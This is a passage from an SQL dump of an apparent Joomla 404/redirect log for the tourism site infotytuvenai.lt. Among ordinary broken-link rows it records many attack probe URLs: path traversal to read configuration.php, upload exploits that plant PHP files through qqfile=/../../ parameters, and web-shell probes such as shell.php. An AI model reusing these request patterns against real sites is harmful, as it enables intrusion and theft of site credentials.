02:50:29','0000-00-00 00:00:00'),(2521,'http://infotytuvenai.lt/index.php/lt//x.php','','','',2,0,'2018-07-28 02:50:41','0000-00-00 00:00:00'),(2522,'http://infotytuvenai.lt/index.php/lt//components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2018-07-28 02:50:55','0000-00-00 00:00:00'),(2523,'http://infotytuvenai.lt/index.php/lt//zXAttacker.php?X=Attacker','','','',1,0,'2018-07-28 02:51:36','0000-00-00 00:00:00'),(2524,'http://infotytuvenai.lt/index.php/lt//components/com_jbcatalog/libraries/jsupload/server/php/files/error.php','','','',1,0,'2018-07-28 02:52:00','0000-00-00 00:00:00'),(2525,'http://infotytuvenai.lt/index.php/lt//modules/mod_socialpinboard_menu/images/socialpinboard/temp/index.php/lt/  <base href=\"http:/infotytuvenai.lt/index.php','','','',1,0,'2018-07-28 02:52:38','0000-00-00 00:00:00'),(2526,'http://infotytuvenai.lt/index.php/lt//tmp/plupload/izo.php','','','',2,0,'2018-07-28 02:54:27','0000-00-00 00:00:00'),(2527,'http://infotytuvenai.lt/index.php/lt//tmp/plupload/izo.phtml','','','',1,0,'2018-07-28 02:54:51','0000-00-00 00:00:00'),(2528,'http://infotytuvenai.lt/index.php/lt//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../izoc.php','','','',1,0,'2018-07-28 02:55:31','0000-00-00 00:00:00'),(2529,'http://infotytuvenai.lt/index.php/lt//components/izoc.php','','','',1,0,'2018-07-28 02:55:43','0000-00-00 00:00:00'),(2530,'http://infotytuvenai.lt/index.php/lt//com_sexycontactform/fileupload/files/error.php','','','',1,0,'2018-07-28 02:56:25','0000-00-00 00:00:00'),(2531,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_simplephotogallery/lib/uploadFile.php','','','',1,0,'2018-07-28 02:57:57','0000-00-00 00:00:00'),(2532,'http://infotytuvenai.lt/index.php/lt//modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"','','','',1,0,'2018-07-28 02:59:10','0000-00-00 00:00:00'),(2533,'http://infotytuvenai.lt/index.php/lt//modules/megamenu/uploadify/error.php','','','',1,0,'2018-07-28 02:59:26','0000-00-00 00:00:00'),(2534,'http://infotytuvenai.lt/index.php/lt//modules/mod_simplefileuploadv1.3/elements/error.php','','','',1,0,'2018-07-28 02:59:49','0000-00-00 00:00:00'),(2535,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_bt_portfolio/error.php','','','',1,0,'2018-07-28 03:00:14','0000-00-00 00:00:00'),(2536,'http://infotytuvenai.lt/index.php/lt//jwallpapers_files/plupload/error.php','','','',1,0,'2018-07-28 03:00:38','0000-00-00 00:00:00'),(2537,'http://infotytuvenai.lt/index.php/lt//components/com_facileforms/libraries/jquery/uploadify.php','','','',1,0,'2018-07-28 03:01:15','0000-00-00 00:00:00'),(2538,'http://infotytuvenai.lt/index.php/lt//components/com_facileforms/libraries/jquery/error.php','','','',1,0,'2018-07-28 03:01:24','0000-00-00 00:00:00'),(2539,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=izoc.php','','','',1,0,'2018-07-28 03:01:52','0000-00-00 00:00:00'),(2540,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_maian15/charts/tmp-upload-images/izoc.php','','','',1,0,'2018-07-28 03:02:01','0000-00-00 00:00:00'),(2541,'http://infotytuvenai.lt/index.php/lt//shell.php','','','',1,0,'2018-07-28 03:04:43','0000-00-00 00:00:00'),(2542,'http://infotytuvenai.lt/index.php/lt//media/shell.php','','','',1,0,'2018-07-28 03:05:53','0000-00-00 00:00:00'),(2543,'http://infotytuvenai.lt/index.php/lt//images/shell.php','','','',1,0,'2018-07-28 03:06:50','0000-00-00 00:00:00'),(2544,'http://infotytuvenai.lt/index.php/lt//098.php','','','',1,0,'2018-07-28 03:07:14','0000-00-00 00:00:00'),(2545,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/maitinimas/gedulingi-pietus','','','',14,0,'2018-08-02 06:38:38','0000-00-00 00:00:00'),(2546,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/maitinimas/maitinimo-meniu','','','',19,0,'2018-08-02 06:38:40','0000-00-00 00:00:00'),(2547,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/24-quis-nostrud-exerci-tation-ipsum-dolor-sit-amet','','','',6,0,'2018-08-02 08:04:31','0000-00-00 00:00:00'),(2548,'http://infotytuvenai.lt/index.php/lt/?option=com_collector&view=filelist&tmpl=component&folder=&type=1','','http://infotytuvenai.lt/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','',61,0,'2018-08-03 05:20:25','0000-00-00 00:00:00'),(2549,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/suvenyrai','','http://www.infotytuvenai.lt/index.php/lt/','',179,0,'2018-08-03 08:09:49','0000-00-00 00:00:00'),(2550,'http://infotytuvenai.lt/index.php/lt/apie-centra/suvenyrai','','','',70,0,'2018-08-03 14:45:47','0000-00-00 00:00:00'),(2551,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php/lt/apgyvendinimas/apgyvendinimas','','','',3,0,'2018-08-04 12:42:44','0000-00-00 00:00:00'),(2552,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/12-masters-and-ph-d-scholarship-call-for-applications','','','',8,0,'2018-08-07 01:33:26','0000-00-00 00:00:00'),(2553,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/23-minim-veniam-quis-nostrud-exerci-tation-ullamcorper-suscipit','','','',7,0,'2018-08-07 03:01:26','0000-00-00 00:00:00'),(2554,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/21-sed-diam-nonummy-nibh-euismod-tincidunt-ut-laoreet-dolore','','','',6,0,'2018-08-07 13:54:07','0000-00-00 00:00:00'),(2555,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/11-education-conference-is-organised-by-esri-eastern','','','',7,0,'2018-08-07 13:55:33','0000-00-00 00:00:00'),(2556,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/15-final-examination-timetable-for-supplementary','','','',7,0,'2018-08-07 14:38:13','0000-00-00 00:00:00'),(2557,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/22-magna-aliquam-erat-volutpat-ut-wisi-enim-ad','','','',6,0,'2018-08-07 19:47:30','0000-00-00 00:00:00'),(2558,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/14-e-learning-training-time-table-2013-2014-semester-1','','','',6,0,'2018-08-07 21:18:37','0000-00-00 00:00:00'),(2559,'http://www.infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',3,0,'2018-08-08 03:36:43','0000-00-00 00:00:00'),(2560,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/20-lorem-ipsum-dolor-sit-amet-consectetuer-adipiscing-elit-lorem-ipsum-dolor-sit-amet-consectetuer-adipiscing-elit-sed-diam-nonummy-nibh-euismod-tincidunt-ut-laoreet-dolore-magna-aliquam-erat-vo','','','',1,0,'2018-08-08 18:41:39','0000-00-00 00:00:00'),(2561,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features','','','',8,0,'2018-08-10 08:38:49','0000-00-00 00:00:00'),(2562,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php/lt/?option=com_content&view=article&id=306','','','',4,0,'2018-08-13 04:30:48','0000-00-00 00:00:00'),(2563,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php/lt/apgyvendinimas/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',4,0,'2018-08-14 14:45:37','0000-00-00 00:00:00'),(2564,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php/lt/apgyvendinimas/index.php','','','',3,0,'2018-08-15 00:41:08','0000-00-00 00:00:00'),(2565,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php','','http://infotytuvenai.lt/index.php','',2,0,'2018-08-16 11:48:16','0000-00-00 00:00:00'),(2566,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/44-paskutinesnaujienos/index.php/lt/pasiulymai','','','',3,0,'2018-08-19 13:23:23','0000-00-00 00:00:00'),(2567,'http://www.infotytuvenai.lt/index.php/lt/baltas vakaras tytuvėnuose','','','',1,0,'2018-08-20 13:07:37','0000-00-00 00:00:00'),(2568,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/44-paskutinesnaujienos/index.php/lt/index.php','','','',3,0,'2018-08-21 14:02:13','0000-00-00 00:00:00'),(2569,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/44-paskutinesnaujienos/index.php/apgyvendinimas','','','',3,0,'2018-08-28 16:38:17','0000-00-00 00:00:00'),(2570,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/44-paskutinesnaujienos/index.php/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',4,0,'2018-09-05 11:25:02','0000-00-00 00:00:00'),(2571,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/44-paskutinesnaujienos/index.php/maitinimas','','','',3,0,'2018-09-07 04:50:08','0000-00-00 00:00:00'),(2572,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php/lt/apgyvendinimas/components/com_k2/js/k2.js?v2.6.7&sitepath=/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',5,0,'2018-09-07 15:57:02','0000-00-00 00:00:00'),(2573,'http://www.infotytuvenai.lt/index.php/lt/?option=com_user&view=reset&layout=confirm','','','',4,0,'2018-09-10 08:16:44','0000-00-00 00:00:00'),(2574,'http://www.infotytuvenai.lt/index.php/en/eng/apie-centra/edukacines-programos','','','',1,0,'2018-09-10 13:05:55','0000-00-00 00:00:00'),(2575,'http://www.infotytuvenai.lt/index.php/en/ru/apie-centra/edukacines-programos','','','',1,0,'2018-09-10 13:11:34','0000-00-00 00:00:00'),(2576,'http://infotytuvenai.lt/index.php/lt/?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php','','','',47,0,'2018-09-12 06:48:04','0000-00-00 00:00:00'),(2577,'http://infotytuvenai.lt/index.php/lt/?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php','','','',47,0,'2018-09-12 06:48:05','0000-00-00 00:00:00'),(2578,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/44-paskutinesnaujienos/index.php/lt/apie-centra','','','',3,0,'2018-09-13 00:31:50','0000-00-00 00:00:00'),(2579,'http://infotytuvenai.lt/index.php/lt/maitinimas/index.php/lt/turizmo-informacija/aktyvus-poilsis','','','',3,0,'2018-09-17 16:08:53','0000-00-00 00:00:00'),(2580,'http://infotytuvenai.lt/index.php/lt/?option=com_easybook','','http://infotytuvenai.lt/index.php/lt/?option=com_easybook','',1,0,'2018-09-22 20:04:24','0000-00-00 00:00:00'),(2581,'http://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../attari.php','','','',6,0,'2018-09-26 19:24:03','0000-00-00 00:00:00'),(2582,'http://www.infotytuvenai.lt/index.php/lt/?option=com_community&view=groups&groupid=33&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0','','','',12,0,'2018-09-26 19:24:05','0000-00-00 00:00:00'),(2583,'http://www.infotytuvenai.lt/index.php/lt/?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&Itemid=1','','','',26,0,'2018-09-26 19:24:06','0000-00-00 00:00:00'),(2584,'http://www.infotytuvenai.lt/index.php/lt/?option=com_jetext&task=download&file=../../configuration.php','','','',4,0,'2018-09-26 19:24:06','0000-00-00 00:00:00'),(2585,'http://www.infotytuvenai.lt/index.php/lt/?option=com_addproperty&task=listing&propertyId=73&action=filedownload&fname=../configuration.php','','','',14,0,'2018-09-26 19:24:06','0000-00-00 00:00:00'),(2586,'http://www.infotytuvenai.lt/index.php/lt/?option=com_facegallery&task=imageDownload&img_name=../../configuration.php','','','',15,0,'2018-09-26 19:24:07','0000-00-00 00:00:00'),(2587,'http://www.infotytuvenai.lt/index.php/lt/?option=com_jtagmembersdirectory&task=attachment&download_file=/../../../../configuration.php','','','',15,0,'2018-09-26 19:24:07','0000-00-00 00:00:00'),(2588,'http://www.infotytuvenai.lt/index.php/lt/?option=com_installer&view=archive','','','',2,0,'2018-09-26 19:24:11','0000-00-00 00:00:00'),(2589,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1538034318.php','','','',1,0,'2018-09-27 22:53:24','0000-00-00 00:00:00'),(2590,'http://infotytuvenai.lt//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',144,0,'2018-09-27 22:53:29','0000-00-00 00:00:00'),(2591,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1538034318.php','','','',1,0,'2018-09-27 22:53:29','0000-00-00 00:00:00'),(2592,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',27,0,'2018-09-27 22:53:30','0000-00-00 00:00:00'),(2593,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_macgallery&view=download&albumid=../../configuration.php','','','',101,0,'2018-09-27 22:53:30','0000-00-00 00:00:00'),(2594,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php','','','',103,0,'2018-09-27 22:53:31','0000-00-00 00:00:00'),(2595,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=/../../../../configuration.php','','','',25,0,'2018-09-27 22:53:31','0000-00-00 00:00:00'),(2596,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_facegallery&task=imageDownload&img_name=../../configuration.php','','','',23,0,'2018-09-27 22:53:31','0000-00-00 00:00:00'),(2597,'http://infotytuvenai.lt/index.php/lt/maitinimas/index.php/lt/?option=com_content&view=article&id=305','','','',4,0,'2018-09-28 08:42:02','0000-00-00 00:00:00'),(2598,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_cckjseblod&task=download&file=configuration.php','','','',111,0,'2018-09-28 10:23:32','0000-00-00 00:00:00'),(2599,'http://infotytuvenai.lt//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=','','','',41,0,'2018-09-28 10:23:33','0000-00-00 00:00:00'),(2600,'http://infotytuvenai.lt//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',157,0,'2018-09-28 10:23:37','0000-00-00 00:00:00'),(2601,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/tytuvenu-regioninis-parkas','','http://infotytuvenai.lt/index.php/lt/turizmo-informacija/tytuvenu-regioninis-parkas','',23,0,'2018-10-01 04:09:48','0000-00-00 00:00:00'),(2602,'http://infotytuvenai.lt/index.php/lt/component/content/category/index.php','','http://infotytuvenai.lt/index.php','',19,0,'2018-10-08 03:36:15','0000-00-00 00:00:00'),(2603,'http://infotytuvenai.lt/index.php/lt//blog/robots.txt','','','',1,0,'2018-10-12 05:10:07','0000-00-00 00:00:00'),(2604,'http://infotytuvenai.lt/index.php/lt//blog/','','','',1,0,'2018-10-12 05:10:07','0000-00-00 00:00:00'),(2605,'http://infotytuvenai.lt/index.php/lt//wordpress/','','','',1,0,'2018-10-12 05:10:07','0000-00-00 00:00:00'),(2606,'http://infotytuvenai.lt/index.php/lt//wp/','','','',1,0,'2018-10-12 05:10:08','0000-00-00 00:00:00'),(2607,'http://infotytuvenai.lt/index.php/trackback/','','http://infotytuvenai.lt/index.php','',3,0,'2018-10-15 03:47:20','0000-00-00 00:00:00'),(2608,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php/lt/projektai/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',2,0,'2018-10-21 23:16:24','0000-00-00 00:00:00'),(2609,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/?option=com_content&view=article&id=305','','','',4,0,'2018-10-22 14:12:10','0000-00-00 00:00:00'),(2610,'http://infotytuvenai.lt/index.php/lt//administrator/index.php','','','',3,0,'2018-10-23 17:38:41','0000-00-00 00:00:00'),(2611,'http://www.infotytuvenai.lt/index.php/lt//license.php','','','',4,0,'2018-10-29 15:59:01','0000-00-00 00:00:00'),(2612,'http://www.infotytuvenai.lt/index.php/lt/images/1.jpg','','','',1,0,'2018-11-03 04:02:24','0000-00-00 00:00:00'),(2613,'http://www.infotytuvenai.lt/index.php/lt/images/4asdf.jpg','','','',1,0,'2018-11-03 08:27:24','0000-00-00 00:00:00'),(2614,'http://www.infotytuvenai.lt/index.php/lt/images/3fasd.jpg','','','',1,0,'2018-11-03 08:38:54','0000-00-00 00:00:00'),(2615,'http://www.infotytuvenai.lt/index.php/lt/images/2fsd.jpg','','','',1,0,'2018-11-03 17:24:04','0000-00-00 00:00:00'),(2616,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/3fasd.jpg','','','',1,0,'2018-11-04 01:35:30','0000-00-00 00:00:00'),(2617,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/4asdf.jpg','','','',1,0,'2018-11-04 01:37:49','0000-00-00 00:00:00'),(2618,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/2fsd.jpg','','','',1,0,'2018-11-04 05:45:23','0000-00-00 00:00:00'),(2619,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/1.jpg','','','',1,0,'2018-11-04 05:49:09','0000-00-00 00:00:00'),(2620,'http://infotytuvenai.lt/index.php/lt/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',4,0,'2018-11-08 22:50:57','0000-00-00 00:00:00'),(2622,'http://infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/function.file-put-contents','','','',1,0,'2018-11-13 00:55:47','0000-00-00 00:00:00'),(2623,'http://infotytuvenai.lt/index.php/lt/function.file-put-contents','','','',5,0,'2018-11-13 01:05:53','0000-00-00 00:00:00'),(2624,'http://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/function.file-put-contents','','','',2,0,'2018-11-13 01:11:55','0000-00-00 00:00:00'),(2625,'http://www.infotytuvenai.lt/index.php/lt/function.file-put-contents','','','',13,0,'2018-11-13 02:33:19','0000-00-00 00:00:00'),(2626,'http://www.infotytuvenai.lt/index.php/lt/component/content/article','','','',12,0,'2018-11-13 05:21:10','0000-00-00 00:00:00'),(2627,'http://www.infotytuvenai.lt/index.php/lt/projektai','','http://www.infotytuvenai.lt/index.php/lt/pasiulymai','',1,0,'2018-11-13 08:42:04','0000-00-00 00:00:00'),(2628,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/undefined/','','','',8,0,'2018-11-14 23:59:16','0000-00-00 00:00:00'),(2629,'http://www.infotytuvenai.lt/index.php/lt/?option=com_contact&Itemid=3','','','',1,0,'2018-11-16 17:42:53','0000-00-00 00:00:00'),(2630,'http://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos?start=36','','','',1,0,'2018-11-18 11:25:23','0000-00-00 00:00:00'),(2631,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/37-vienuolynas','','','',1,0,'2018-11-18 14:35:34','0000-00-00 00:00:00'),(2632,'http://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/','','http://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/','',1,0,'2018-11-18 17:00:34','0000-00-00 00:00:00'),(2633,'http://www.infotytuvenai.lt/index.php/lt/robots.txt','','','',71,0,'2018-11-19 22:24:01','0000-00-00 00:00:00'),(2634,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/44-paskutinesnaujienos/index.php/lt/?option=com_content&view=article&id=305','','','',4,0,'2018-11-26 03:13:25','0000-00-00 00:00:00'),(2635,'http://infotytuvenai.lt/index.php/lt/index.php/lt/index.php','','http://infotytuvenai.lt/index.php','',12,0,'2018-12-07 09:52:06','0000-00-00 00:00:00'),(2636,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php/lt/13-sample-data-article/demo/features/index.php/lt/?option=com_content&view=article&id=306','','','',2,0,'2018-12-07 17:59:42','0000-00-00 00:00:00'),(2637,'http://www.infotytuvenai.lt/index.php/lt/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',2,0,'2018-12-09 16:14:41','0000-00-00 00:00:00'),(2638,'http://infotytuvenai.lt/index.php/lt/index.php/lt/?option=com_content&view=article&id=305','','','',2,0,'2018-12-11 04:05:33','0000-00-00 00:00:00'),(2639,'http://infotytuvenai.lt/index.php/lt/templates/system/css/system.css','','','',29,0,'2018-12-14 06:01:20','0000-00-00 00:00:00'),(2640,'http://infotytuvenai.lt/index.php/lt/media/system/js/mootools-more.js','','','',2,0,'2018-12-14 06:01:20','0000-00-00 00:00:00'),(2641,'http://infotytuvenai.lt/index.php/lt/language/en-GB/en-GB.ini','','','',4,0,'2018-12-14 06:01:21','0000-00-00 00:00:00'),(2642,'http://infotytuvenai.lt/index.php/lt/language/en-GB/en-GB.xml','','','',9,0,'2018-12-14 06:01:21','0000-00-00 00:00:00'),(2643,'http://infotytuvenai.lt/index.php/lt/media/plg_quickicon_extensionupdate/js/extensionupdatecheck.js','','','',1,0,'2018-12-14 06:01:21','0000-00-00 00:00:00'),(2644,'http://infotytuvenai.lt/index.php/lt/components/com_tags/views/tag/metadata.xml','','','',1,0,'2018-12-14 06:01:21','0000-00-00 00:00:00'),(2645,'http://infotytuvenai.lt/index.php/lt/components/com_config/model/form/templates.xml','','','',1,0,'2018-12-14 06:01:22','0000-00-00 00:00:00'),(2646,'http://infotytuvenai.lt/index.php/lt/plugins/search/tags/tags.xml','','','',1,0,'2018-12-14 06:01:22','0000-00-00 00:00:00'),(2647,'http://infotytuvenai.lt/index.php/lt/media/system/js/mootools.js','','','',1,0,'2018-12-14 06:01:22','0000-00-00 00:00:00'),(2648,'http://www.infotytuvenai.lt/index.php/lt/images/logas be fono 1.png','','','',2,0,'2018-12-17 09:23:52','0000-00-00 00:00:00'),(2649,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../root.php','','','',8,0,'2018-12-18 20:38:53','0000-00-00 00:00:00'),(2650,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../root.php','','','',8,0,'2018-12-18 20:38:55','0000-00-00 00:00:00'),(2651,'http://www.infotytuvenai.lt/index.php/lt/images/Lietuvos LEADER logotipas 1.jpg','','','',5,0,'2018-12-20 02:37:33','0000-00-00 00:00:00'),(2652,'http://www.infotytuvenai.lt/index.php/lt/images/KPF.jpg','','','',2,0,'2018-12-20 09:39:38','0000-00-00 00:00:00'),(2653,'http://infotytuvenai.lt/index.php/lt/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:39','0000-00-00 00:00:00'),(2654,'http://infotytuvenai.lt/index.php/lt/index.php/lt/admin/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:40','0000-00-00 00:00:00'),(2655,'http://infotytuvenai.lt/index.php/lt/cgi-bin/index.php/lt/awstats/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:40','0000-00-00 00:00:00'),(2656,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:41','0000-00-00 00:00:00'),(2657,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:41','0000-00-00 00:00:00'),(2658,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:42','0000-00-00 00:00:00'),(2659,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:42','0000-00-00 00:00:00'),(2660,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:42','0000-00-00 00:00:00'),(2661,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:43','0000-00-00 00:00:00'),(2662,'http://infotytuvenai.lt/index.php/lt/admin_area/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:43','0000-00-00 00:00:00'),(2663,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_jnewsletter/includes/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:43','0000-00-00 00:00:00'),(2664,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:44','0000-00-00 00:00:00'),(2665,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:44','0000-00-00 00:00:00'),(2666,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:44','0000-00-00 00:00:00'),(2667,'http://infotytuvenai.lt/index.php/lt/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',1,0,'2018-12-26 12:39:45','0000-00-00 00:00:00'),(2668,'http://infotytuvenai.lt/index.php/lt/?option=com_virtuemart&page=shop.registration','','','',1,0,'2019-01-02 03:01:25','0000-00-00 00:00:00'),(2669,'http://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../test.php','','http://www.infotytuvenai.lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../test.php','',1,0,'2019-01-04 14:49:38','0000-00-00 00:00:00'),(2670,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/?start=48','','','',2,0,'2019-01-21 00:08:19','0000-00-00 00:00:00'),(2671,'http://infotytuvenai.lt/index.php/lt/index.php','','','',1,0,'2019-01-29 05:45:17','0000-00-00 00:00:00'),(2672,'http://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu','','','',2,0,'2019-01-30 17:08:47','0000-00-00 00:00:00'),(2673,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu','','http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',14,0,'2019-02-01 08:10:12','0000-00-00 00:00:00'),(2674,'http://www.infotytuvenai.lt/index.php/lt/images/6 page.jpg','','','',2,0,'2019-02-11 06:52:21','0000-00-00 00:00:00'),(2675,'http://www.infotytuvenai.lt/index.php/lt/images/1 page.jpg','','','',2,0,'2019-02-11 07:18:33','0000-00-00 00:00:00'),(2676,'http://www.infotytuvenai.lt/index.php/lt/images/7 page.jpg','','','',2,0,'2019-02-11 11:55:31','0000-00-00 00:00:00'),(2677,'http://www.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/','','','',9,0,'2019-02-11 12:19:53','0000-00-00 00:00:00'),(2678,'http://www.infotytuvenai.lt/index.php/lt/images/4 page.jpg','','','',2,0,'2019-02-11 15:31:44','0000-00-00 00:00:00'),(2679,'http://www.infotytuvenai.lt/index.php/lt/images/2 page.jpg','','','',2,0,'2019-02-12 02:02:38','0000-00-00 00:00:00'),(2680,'http://www.infotytuvenai.lt/index.php/lt/images/5 page.jpg','','','',2,0,'2019-02-12 13:30:32','0000-00-00 00:00:00'),(2681,'http://www.infotytuvenai.lt/index.php/lt/images/3 page.jpg','','','',2,0,'2019-02-12 17:20:48','0000-00-00 00:00:00'),(2682,'http://infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/','','','',7,0,'2019-02-13 05:25:08','0000-00-00 00:00:00'),(2683,'http://infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/321-maitinimo-meniu','','','',9,0,'2019-02-27 03:11:01','0000-00-00 00:00:00'),(2685,'http://infotytuvenai.lt/index.php/lt/gaestebuch','','','',4,0,'2019-03-04 15:56:31','0000-00-00 00:00:00'),(2686,'http://infotytuvenai.lt/index.php/lt/?option=com_easygb','','','',2,0,'2019-03-04 15:56:32','0000-00-00 00:00:00'),(2687,'http://infotytuvenai.lt/index.php/lt/?option=com_jambook','','','',2,0,'2019-03-04 15:56:33','0000-00-00 00:00:00'),(2688,'http://infotytuvenai.lt/index.php/lt/component/jambook','','','',2,0,'2019-03-04 15:56:34','0000-00-00 00:00:00'),(2689,'http://infotytuvenai.lt/index.php/lt/guestbook','','','',4,0,'2019-03-04 15:56:35','0000-00-00 00:00:00'),(2690,'http://infotytuvenai.lt/index.php/lt/?option=com_phocaguestbook','','','',2,0,'2019-03-04 15:56:37','0000-00-00 00:00:00'),(2691,'http://www.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/321-maitinimo-meniu','','','',3,0,'2019-03-05 